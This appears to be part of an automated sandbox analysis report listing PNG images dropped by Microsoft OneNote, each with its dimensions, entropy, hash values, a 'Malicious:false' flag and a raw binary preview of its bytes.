                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
